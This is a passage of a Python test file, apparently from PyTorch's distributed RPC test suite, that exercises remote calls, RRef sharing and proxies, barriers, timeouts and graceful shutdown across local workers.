        # Wait before proceeding to shutdown to ensure worker0 RPCs make
        # it through to other workers.
        dist.barrier()
        rpc.shutdown(graceful=False)
    def _wait_all_workers_twice(self, f, x):
        """Same as _wait_all_workers but calls _wait_all_workers twice in a row."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        self._run_uneven_workload(f, x)
        # worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 calls this immediately and has some works after it.
        # worker3 calls this immediately and has no more work.
        rpc.api._wait_all_workers()
        rpc.api._wait_all_workers()
        # Wait before proceeding to shutdown to ensure worker0 RPCs make
        # it through to other workers.
        dist.barrier()
        rpc.shutdown(graceful=False)
    def _nested_rpc(self, f, expected):
        """Call `f` on the next rank, passing our own name so it can call back."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            f,
            args=(worker_name(self.rank),),
        )
        self.assertEqual(ret, expected)
    def _stress_test_rpc(self, f, repeat=1000, args=()):
        """Fire `repeat` concurrent rpc_async calls and check every result is 0."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        futs = []
        tik = time.time()
        for _ in range(repeat):
            fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
            futs.append(fut)
        for val in torch.futures.wait_all(futs):
            self.assertEqual(val, 0)
        tok = time.time()
        print(
            "Rank {} finished testing {} times in {} seconds.".format(
                self.rank, repeat, tok - tik
            )
        )
    def _builtin_remote_ret(self, x, y, expected):
        """rpc.remote on a builtin; fetch the result with to_here()."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref = rpc.remote(
            worker_name(dst_rank),
            torch.add,
            args=(x, y),
        )
        self.assertEqual(rref.to_here(), expected)
    def _builtin_remote_self(self, x, y, expected):
        """rpc.remote targeted at ourselves; read the result via local_value()."""
        rref = rpc.remote(
            worker_name(self.rank),
            torch.add,
            args=(x, y),
        )
        self.assertEqual(rref.local_value(), expected)
    def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
        """Issue `m` rpc.remote calls with generated args and compare to local runs."""
        m = 10
        n = self.rank + 1
        dst_rank = n % self.world_size
        rrefs = []
        expected = []
        for i in range(m):
            n = n + i
            rrefs.append(
                rpc.remote(
                    worker_name(dst_rank),
                    fn,
                    args=args_fn(n, sparse),
                    kwargs=kwargs_fn(n, sparse),
                )
            )
            expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
        for i in range(m):
            self.assertEqual(rrefs[i].to_here(), expected[i])
    def _py_rref_args(self, a, b, x, y, expected):
        """Pass two owner RRefs as arguments to a third remote call on the same owner."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref_a = rpc.remote(
            worker_name(dst_rank), torch.add, args=(a, b)
        )
        rref_b = rpc.remote(
            worker_name(dst_rank), torch.add, args=(x, y)
        )
        rref_c = rpc.remote(
            worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
        )
        self.assertEqual(rref_c.to_here(), expected)
    def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
        """Share user RRefs: owner and consumer of the RRefs are different workers."""
        n = self.rank + 1
        owner_rank = n % self.world_size
        user_rank = (n + 1) % self.world_size
        rref_a = rpc.remote(
            worker_name(owner_rank), my_function, args=(a, b, c)
        )
        rref_b = rpc.remote(
            worker_name(owner_rank), my_function, args=(x, y, z)
        )
        rref_c = rpc.remote(
            worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
        )
        self.assertEqual(rref_c.to_here(), expected)
    def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
        """Pass RRefs as arguments of a plain rpc_sync call."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref_a = rpc.remote(
            worker_name(dst_rank), my_function, args=(a, b, c)
        )
        rref_b = rpc.remote(
            worker_name(dst_rank), my_function, args=(x, y, z)
        )
        c = rpc.rpc_sync(
            worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
        )
        self.assertEqual(c, expected)
    def _nested_remote(self, f, expected):
        """rpc.remote a function that itself issues an RPC to a third worker."""
        n = self.rank + 1
        dst_rank1 = n % self.world_size
        dst_rank2 = (n + 1) % self.world_size
        rref = rpc.remote(
            worker_name(dst_rank1),
            f,
            args=(worker_name(dst_rank2),),
        )
        self.assertEqual(rref.to_here(), expected)
    def _nested_rref(self, f, expected1, expected2):
        """Fetch an RRef whose value is itself a pair of RRefs owned elsewhere."""
        n = self.rank + 1
        dst_rank1 = n % self.world_size
        dst_rank2 = (n + 1) % self.world_size
        rref_of_rrefs = rpc.remote(
            worker_name(dst_rank1),
            f,
            args=(worker_name(dst_rank2),),
        )
        # Say C has 2 OwnerRRefs.
        # B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
        # This call is effectively A asking B to share its 2 UserRRefs.
        rrefs = rref_of_rrefs.to_here()
        self.assertEqual(len(rrefs), 2)
        self.assertEqual(rrefs[0].to_here(), expected1)
        self.assertEqual(rrefs[1].to_here(), expected2)
    def _nested_rref_stress(self, f, expected1, expected2):
        """Stress variant of _nested_rref: 20 concurrent nested-RRef round trips."""
        n = self.rank + 1
        dst_rank1 = n % self.world_size
        dst_rank2 = (n + 1) % self.world_size
        all_rrefs = []
        for _ in range(20):
            all_rrefs.append(
                rpc.remote(
                    worker_name(dst_rank1),
                    f,
                    args=(worker_name(dst_rank2),),
                )
            )
        for i in range(20):
            rref_of_rrefs = all_rrefs[i]
            rrefs = rref_of_rrefs.to_here()
            self.assertEqual(len(rrefs), 2)
            self.assertEqual(rrefs[0].to_here(), expected1)
            self.assertEqual(rrefs[1].to_here(), expected2)
    def _my_parameter_server(self, sparse):
        """Drive one MyParameterServer round with world_size - 1 remote trainers.

        Relies on self._trainer_func, which subclasses must define.
        """
        ps_rref = RRef(MyParameterServer(self.world_size - 1))
        futures = []
        for index in range(1, self.world_size):
            futures.append(
                rpc.rpc_async(
                    worker_name((self.rank + index) % self.world_size),
                    self._trainer_func,
                    args=(
                        ps_rref,
                        sparse
                    ),
                )
            )
        torch.futures.wait_all(futures)
    def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
        # We check proper CUDA stream synchronization by adding to the tensor
        # in one stream to get the expected value, and reading it from another stream.
        future = Future(devices=["cuda:0"])
        with torch.cuda.device("cuda:0"):
            stream = torch.cuda.Stream()
            another_stream = torch.cuda.Stream()
            with torch.cuda.stream(stream):
                if sparse_tensor:
                    tensor = build_sparse_tensor().to("cuda:0")
                    add_tensor = build_sparse_tensor().to("cuda:0")
                    expected_tensor = (tensor + add_tensor).coalesce()
                else:
                    tensor = torch.zeros((100,), device="cuda:0")
                    add_tensor = torch.ones((100,), device="cuda:0")
                    expected_tensor = tensor + add_tensor
                # Delay the write so an unsynchronized reader would see stale data.
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor += add_tensor
                if sparse_tensor:
                    tensor = tensor.coalesce()
                future.set_result(wrapper(tensor))
            with torch.cuda.stream(another_stream):
                # future.wait() must synchronize this stream with the writer stream.
                tensor = unwrapper(future.wait())
                if sparse_tensor:
                    self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
                    self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
                    self.assertEqual(tensor.size(), expected_tensor.size())
                else:
                    self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
    @dist_init
    def test_get_worker_infos(self):
        """The agent reports exactly one WorkerInfo per rank with matching names/ids."""
        worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
        worker_names = {worker_info.name for worker_info in worker_infos}
        expected_worker_names = {
            worker_name(rank) for rank in range(self.world_size)
        }
        self.assertEqual(worker_names, expected_worker_names)
        worker_ids = {worker_info.id for worker_info in worker_infos}
        expected_worker_ids = set(range(self.world_size))
        self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
    @dist_init
    def test_rref_proxy_non_exist(self):
        """All three RRef proxies raise AttributeError for a missing attribute."""
        dst = worker_name((self.rank + 1) % self.world_size)
        rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
        msg = "has no attribute \'non_exist\'"
        with self.assertRaisesRegex(AttributeError, msg):
            rref.rpc_sync().non_exist()
        with self.assertRaisesRegex(AttributeError, msg):
            rref.rpc_async().non_exist().wait()
        with self.assertRaisesRegex(AttributeError, msg):
            rref.remote().non_exist()
    def _test_rref_proxy_tensor(self, dst):
        """Invoke tensor methods through rpc_sync/rpc_async/remote RRef proxies."""
        rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
        expected = torch.ones(2, 2) + 1 + 3
        self.assertEqual(expected.size(), rref.rpc_sync().size())
        self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
        self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
    @dist_init
    def test_rref_proxy_reuse(self):
        """Each proxy object (rpc_sync/rpc_async/remote) can be reused for many calls."""
        rref = rpc.remote(
            worker_name((self.rank + 1) % self.world_size),
            my_function,
            args=(torch.ones(2, 2), 1, 3)
        )
        expected = torch.ones(2, 2) + 1 + 3
        proxy_rpc_sync = rref.rpc_sync()
        proxy_rpc_async = rref.rpc_async()
        proxy_remote = rref.remote()
        self.assertEqual(expected.size(), proxy_rpc_sync.size())
        self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
        self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
        self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
        self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
        self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
        self.assertEqual(expected.size(), proxy_remote.size().to_here())
        self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
        self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
    def _test_rref_proxy_class(self, dst):
        """Exercise instance, static, and class methods through all RRef proxies.

        A local MyClass mirrors every mutation so the remote results can be
        compared against it.
        """
        rref = rpc.remote(dst, MyClass, args=(7,))
        expected = MyClass(7)
        self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
        self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
        self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
        expected.increment_value(3)
        self.assertEqual(None, rref.rpc_sync().increment_value(1))
        self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
        self.assertEqual(None, rref.remote().increment_value(1).to_here())
        self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
        self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
        self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
        self.assertEqual(
            expected.my_instance_method(2),
            rref.rpc_sync().my_instance_method(2)
        )
        self.assertEqual(
            expected.my_instance_method(3),
            rref.rpc_async().my_instance_method(3).wait()
        )
        self.assertEqual(
            expected.my_instance_method(4),
            rref.remote().my_instance_method(4).to_here()
        )
        self.assertEqual(
            expected.my_static_method(9),
            rref.rpc_sync().my_static_method(9)
        )
        self.assertEqual(
            expected.my_static_method(10),
            rref.rpc_async().my_static_method(10).wait()
        )
        self.assertEqual(
            expected.my_static_method(11),
            rref.remote().my_static_method(11).to_here()
        )
        self.assertEqual(
            expected.my_class_method(2, torch.zeros(2, 2)),
            rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
        )
        self.assertEqual(
            expected.my_class_method(2, torch.ones(3, 3)),
            rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
        )
        self.assertEqual(
            expected.my_class_method(2, torch.ones(4, 4)),
            rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
        )
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
    @mock.patch.object(torch.distributed.autograd, "_init")
    @mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
    @dist_init(setup_rpc=False)
    def test_register_rpc_backend_and_set_and_start_rpc_backend(
        self, mock_rpc_agent, mock_dist_autograd_init
    ):
        """A backend can be registered once; re-registering the same name raises."""
        backend_name = "stub_backend"
        backend = rpc.backend_registry.register_backend(
            backend_name,
            _stub_construct_rpc_backend_options_handler,
            _stub_init_rpc_backend_handler,
        )
        with self.assertRaisesRegex(
            RuntimeError, "^RPC backend .+: already registered$"
        ):
            backend = rpc.backend_registry.register_backend(
                backend_name,
                _stub_construct_rpc_backend_options_handler,
                _stub_init_rpc_backend_handler,
            )
        # init_rpc succeeds with the stub backend; agent start is mocked out.
        rpc.init_rpc(
            name="worker1",
            backend=backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
    @dist_init(setup_rpc=False)
    def test_duplicate_name(self):
        """Initializing every rank with the same worker name is rejected."""
        with self.assertRaisesRegex(RuntimeError, "is not unique"):
            store, _, _ = next(
                torch.distributed.rendezvous(
                    self.init_method, rank=self.rank, world_size=self.world_size
                )
            )
            rpc._init_rpc_backend(
                backend=self.rpc_backend,
                store=store,
                name="duplicate_name",
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=self.rpc_backend_options,
            )
    @dist_init(setup_rpc=False)
    def test_duplicate_name_2(self):
        """Name collisions via modulo-wrapped ranks are rejected by init_rpc."""
        with self.assertRaisesRegex(RuntimeError, "is not unique"):
            rpc.init_rpc(
                name=worker_name(self.rank % (self.world_size - 1)),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=self.rpc_backend_options,
            )
    @dist_init(setup_rpc=False)
    def test_reinit(self):
        """Calling init_rpc a second time on an initialized worker raises."""
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Wait for all init to complete.
        dist.barrier()
        # TODO: with TCP init, rank 0 raises Address already in use because
        # rank 0 is the start daemon and the store is created before checking if
        # RPC is already initialized in init_rpc.
        if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
            expected_reinit_err = "Address already in use"
        else:
            expected_reinit_err = "is already initialized"
        with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=self.rpc_backend_options,
            )
        rpc.shutdown()
    @dist_init(setup_rpc=False)
    def test_pg_init_no_rpc_init(self):
        """Creating RRefs without init_rpc fails even when a process group exists."""
        dist.init_process_group(
            backend='gloo',
            init_method=self.file_init_method,
            rank=self.rank,
            world_size=self.world_size)
        class MyModel(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.lin = torch.nn.Linear(3, 4)
            def forward(self, x):
                return self.lin(x)
        model = MyModel()
        model.train()
        model = torch.nn.parallel.DistributedDataParallel(model)
        with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
            params = []
            for param in model.parameters():
                params.append(RRef(param))
    def test_world_size_one(self):
        """Single-worker RPC world; no @dist_init since the helper inits RPC itself."""
        self._world_size_one(
            torch.ones(2, 2),
            torch.ones(2, 2)
        )
@dist_init(setup_rpc=False)
def test_invalid_names(self):
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
    # Test that WorkerInfo can be pickled and sent in RPC call
    @dist_init
    def test_worker_info_pickle(self):
        """A WorkerInfo survives a pickling round trip through an RPC call."""
        dst_rank = (self.rank + 1) % self.world_size
        worker_info = rpc.api.get_worker_info()
        ret = rpc.rpc_sync(worker_name(dst_rank), identity, args=(worker_info,))
        self.assertEqual(ret, worker_info)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
    @staticmethod
    def return_callee_id():
        """Return the worker id of whichever worker executes this call."""
        return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
    @dist_init
    def test_nonzero(self):
        """torch.nonzero executed remotely matches the local result."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        x = torch.ones(self.world_size, self.world_size)
        # Zero out one element so nonzero() has something non-trivial to report.
        x[self.rank][self.rank] = 0
        ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
        self.assertEqual(ret, x.nonzero())
    @dist_init
    def test_multi_rpc(self):
        """Twenty consecutive dense rpc_sync adds all return correct results."""
        self._multi_rpc(False)
    @dist_init
    def test_future_wait_twice(self):
        """A failed Future re-raises the same error on every subsequent wait()."""
        dst = worker_name((self.rank + 1) % self.world_size)
        futs = []
        for i in range(20):
            futs.append(rpc.rpc_async(dst, raise_func))
        with self.assertRaisesRegex(ValueError, "Expected error"):
            torch.futures.wait_all(futs)
        # Waiting again on the already-failed futures must raise again.
        for fut in futs:
            with self.assertRaisesRegex(ValueError, "Expected error"):
                fut.wait()
    def _run_uneven_workload(self, f, x, num_repeat=30):
        """Drive two sequential phases of work from worker0 only.

        Phase 1 loads worker1, phase 2 loads worker2; if shutdown/join logic is
        wrong, worker2 may already be gone by phase 2. Other ranks do nothing.
        """
        # worker0 drives and waits for worker1 and worker2
        # throughout the test.
        if self.rank == 0:
            self.assertTrue(self.world_size >= 3)
            # Phase 1: Only worker1 has workload.
            dst = "worker1"
            futs = []
            for _ in range(num_repeat):
                fut = rpc.rpc_async(dst, f, args=(x,))
                futs.append(fut)
            for fut in torch.futures.collect_all(futs).wait():
                self.assertEqual(fut.wait(), 0)
            # Phase 2: Only worker2 has workload.
            # If join is not correctly implemented,
            # worker2 should be closed by now.
            dst = "worker2"
            futs = []
            for _ in range(num_repeat):
                fut = rpc.rpc_async(dst, f, args=(x,))
                futs.append(fut)
            for val in torch.futures.wait_all(futs):
                self.assertEqual(val, 0)
    @dist_init(setup_rpc=False)
    def test_wait_all_workers_timeout(self):
        """Graceful shutdown propagates a timeout raised inside _wait_all_workers.

        Temporarily monkey-patches rpc.api._wait_all_workers with a slow
        version and restores it in a finally block.
        """
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        og_func = rpc.api._wait_all_workers
        def wait_all_workers_sleep(timeout):
            try:
                rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
            except RuntimeError as ex:
                raise ex
        rpc.api._wait_all_workers = wait_all_workers_sleep
        try:
            with self.assertRaisesRegex(RuntimeError, ''):
                rpc.shutdown(graceful=True, timeout=0.01)
        finally:
            rpc.api._wait_all_workers = og_func
        dist.barrier()
    def test_wait_all_workers_dense(self):
        """_wait_all_workers with a dense heavy workload; helper inits RPC itself."""
        self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
    def test_wait_all_workers_twice_dense(self):
        """Calling _wait_all_workers twice in a row must be safe (dense workload)."""
        self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
    @dist_init
    def test_all_gather(self):
        """_all_gather returns a name -> gathered-value map covering every worker."""
        info = rpc.get_worker_info()
        results = rpc.api._all_gather(info.id)
        expected = {}
        for info in rpc._get_current_rpc_agent().get_worker_infos():
            expected[info.name] = info.id
        self.assertEqual(expected, results)
    @dist_init
    def test_all_gather_timeout(self):
        """_all_gather times out when a peer's payload unpickles too slowly.

        Rank 0 (the gather leader) sees the _all_gather-specific message;
        other ranks see the generic agent timeout error.
        """
        rpc._set_rpc_timeout(0.1)
        if self.rank == 0:
            with self.assertRaisesRegex(
                RuntimeError,
                "timed out in _all_gather after 0\\.10 seconds"
            ):
                rpc.api._all_gather(SlowPickleClass(0.5))
        else:
            expected_error = self.get_timeout_error_regex()
            with self.assertRaisesRegex(RuntimeError, expected_error):
                rpc.api._all_gather(SlowPickleClass(0.5))
    def _test_barrier_helper(self, info, names, multi_threaded=False):
        """Verify rpc.api._barrier orders a counter increment across `names`.

        The sorted-first worker acts as leader and holds the shared counter;
        counter checks are skipped in multi-threaded mode where the count is
        nondeterministic.
        """
        names = sorted(names)
        leader = names[0]
        rpc.rpc_sync(leader, _reset_count)
        if not multi_threaded and info.name == leader:
            self.assertEqual(_rpc_barrier_count, 0)
        rpc.api._barrier(names)
        rpc.rpc_sync(leader, _increment_count)
        rpc.api._barrier(names)
        if not multi_threaded and info.name == leader:
            self.assertEqual(_rpc_barrier_count, len(names))
    @dist_init
    def test_rpc_barrier_all(self):
        # Test rpc barrier when called with full list of workers
        """Barrier over the full worker list."""
        info = rpc.get_worker_info()
        all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
        names = [worker.name for worker in all_worker_info]
        self._test_barrier_helper(info, names)
    @dist_init
    def test_rpc_barrier_subset(self):
        # Test rpc barrier when processes are called with different subsets of the full list
        """Odd-id and even-id workers each form their own disjoint barrier."""
        info = rpc.get_worker_info()
        all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
        if info.id % 2:
            names = [worker.name for worker in all_worker_info if worker.id % 2]
        else:
            names = [worker.name for worker in all_worker_info if not worker.id % 2]
        self._test_barrier_helper(info, names)
    @dist_init
    def test_rpc_barrier_partial_subset(self):
        # Test rpc barrier when some processes are not involved in the barrier
        """Even-id workers barrier only with themselves (singleton name lists)."""
        info = rpc.get_worker_info()
        all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
        if info.id % 2:
            names = [worker.name for worker in all_worker_info if worker.id % 2]
        else:
            names = [f"worker{info.id}"]
        self._test_barrier_helper(info, names)
    @dist_init
    def test_rpc_barrier_multithreaded(self):
        # This tests validates the implementation of barrier when multiple threads call into it
        # We only need to check that it does not hang in this case
        """Three local threads entering the barrier concurrently must not deadlock."""
        info = rpc.get_worker_info()
        all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
        names = [worker.name for worker in all_worker_info]
        threads = []
        for _ in range(3):
            th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
            threads.append(th)
            th.start()
        for th in threads:
            th.join()
    @dist_init
    def test_graceful_shutdown_with_uneven_workload(self):
        """Test graceful termination."""
        self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
    @dist_init(setup_rpc=False)
    def test_shutdown_followed_by_rpc(self):
        """RPC works before shutdown and raises a clear error afterwards."""
        # Initialize RPC.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        self.assertEqual(ret, torch.ones(n, n) * 2)
        rpc.shutdown()
        # After shutdown, any RPC must fail with the uninitialized error.
        with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
            rpc.rpc_sync(
                worker_name(dst_rank),
                torch.add,
                args=(torch.ones(n, n), torch.ones(n, n)),
            )
    @dist_init
    def test_expected_src(self):
        """The callee observes the caller's rank (recorded via set_value/VALUE_FUTURE)."""
        dst_rank = (self.rank + 1) % self.world_size
        expected_src_rank = (self.rank - 1) % self.world_size
        ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
        value = VALUE_FUTURE.result()
        self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
    def test_build_rpc_profiling_key(self):
        # Tests that the name that shows up as an Event in profiling RPCs has all
        # the necessary information.
        """The profiling key embeds exec mode, function name, and both worker names."""
        for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
            rpc_profiling_key = _build_rpc_profiling_key(
                exec_mode, "foo", "worker0", "worker1"
            )
            self.assertIn(exec_mode.value, rpc_profiling_key)
            self.assertIn("foo", rpc_profiling_key)
            self.assertIn("worker0", rpc_profiling_key)
            self.assertIn("worker1", rpc_profiling_key)
    def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
        """Assert one profiler event names both workers, the function, and the mode."""
        self.assertTrue(self_worker_name in rpc_event.name)
        self.assertTrue(dst_worker_name in rpc_event.name)
        # Script functions are profiled under their qualified JIT name.
        if isinstance(func, torch.jit.ScriptFunction):
            self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
        else:
            self.assertTrue(func.__name__ in rpc_event.name)
